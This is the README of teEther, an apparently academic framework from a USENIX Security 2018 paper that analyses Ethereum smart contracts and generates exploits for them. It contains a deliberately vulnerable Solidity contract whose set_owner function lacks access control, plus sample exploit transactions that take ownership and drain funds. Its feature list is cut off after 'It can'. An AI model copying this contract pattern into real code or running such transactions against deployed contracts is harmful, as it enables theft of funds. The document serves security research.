/teether

Primary LanguagePythonApache License 2.0Apache-2.0

teEther - Analysis and automatic exploitation framework for Ethereum smart contracts

teEther is an analysis tool for Ethereum smart contracts. It can

Quickstart

  1. Install teEther
python setup.py install
  1. Write your vulnerable smart contract
pragma solidity ^0.4.0;

contract Test{

    struct Transaction{
        address to;
        uint amount;
    }

    mapping (bytes32 => Transaction) transactions;

    address owner;
    
    function set_owner(address new_owner){
        owner = new_owner;
    }
    
    function new_transaction(address to, uint amount) returns (bytes32){
        bytes32 token = sha3(to, amount);
        Transaction storage t = transactions[token];
        t.to = to;
        t.amount += amount;
        return token;
    }
    
    function approve(bytes32 token){
        require(owner == msg.sender);
        Transaction storage t = transactions[token];
        t.to.transfer(t.amount);
        delete transactions[token];
    }
    
}
  1. Compile your contract
$ solc --bin test.sol | tail -n1 > test.code
  1. Extract the deployed contract code
$ python bin/extract_contract_code.py test.code > test.contract.code
  1. Generate an exploit
$ python bin/gen_exploit.py test.contract.code 0x1234 0x1000 +1000

...
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0x7cb97b2b0000000000000000000000000000000000000000000000000000000000001234", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0x0129ab2700000000000000000000000000000000000000000000000000000000000012340000000000000000000000000000000000000000000000016bc75e2d63100103", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0xa53a1adfce9e2ef9fe2568f35b22f98bb749862a13e0abd291c6ba4967016d629412829d", to:"0x4000000000000000000000000000000000000000", gasPrice:0})

Academia

Our paper teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts was published at the 27th USENIX Security Symposium (Usenix Security 18) (slides, video).

@inproceedings{teEther2018,
          author = {Johannes Krupp and Christian Rossow},
       publisher = {USENIX Association},
       booktitle = {27th USENIX Security Symposium (USENIX Security 18)},
            year = {2018},
           title = {{teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts}},
             url = {https://publications.cispa.saarland/2612/},
}